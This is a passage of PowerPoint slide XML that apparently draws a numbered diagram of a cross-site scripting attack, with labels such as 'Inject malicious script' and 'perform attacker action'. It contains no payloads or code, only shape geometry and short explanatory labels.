                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2148926" y="4140789"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4356419"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4322292"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="1905000"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="447040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1860"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>execute script  embedded in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>input  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>as though server  meant us to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979613" y="5049837"/>
            <a:ext cx="2740025" cy="989330"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2740025" h="989329">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2739988" y="989098"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664177" y="5983512"/>
            <a:ext cx="122530" cy="89026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2223650" y="5196045"/>
            <a:ext cx="2634821" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="5555" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>perform </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840027" y="4624502"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
